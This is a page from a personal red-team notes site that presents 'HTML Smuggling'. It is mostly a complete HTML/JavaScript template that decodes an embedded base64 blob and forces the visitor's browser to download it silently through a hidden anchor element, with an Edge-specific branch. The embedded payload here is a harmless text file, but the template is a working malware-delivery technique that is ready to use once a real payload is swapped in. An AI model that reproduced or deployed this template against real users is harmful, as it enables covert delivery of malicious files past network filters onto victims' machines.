xct's notes
Search…
Web

HTML Smuggling

Abuses HTML5 anchor attribute to automatically download a file:
1
<html>
2
<body>
3
<script>
4
function base64ToArrayBuffer(base64){
5
var binary_string = window.atob(base64);
6
var len = binary_string.length;
7
var bytes = new Uint8Array(len);
8
for (var i=0;i<len;i++) { bytes[i] = binary_string.charCodeAt(i); }
9
return bytes.buffer;
10
}
11
12
var file = 'eGN0Cg=='
13
var blob = new Blob([base64ToArrayBuffer(file)], {type: 'octet/stream'});
14
var fileName = "xct.txt"
15
16
// Edge
17
if(navigator.msSaveBlob) {
18
navigator.msSaveBlob(blob,fileName);
19
// Other Browsers
20
} else {
21
var a = document.createElement('a');
22
document.body.appendChild(a);
23
a.style = 'display: none';
24
var url = window.URL.createObjectURL(blob);
25
a.href = url;
26
a.download = fileName;
27
a.click();
28
window.URL.revokeObjectURL(url);
29
}
30
</script>
31
</body>
32
</html>
Copied!
Last modified 1yr ago
Copy link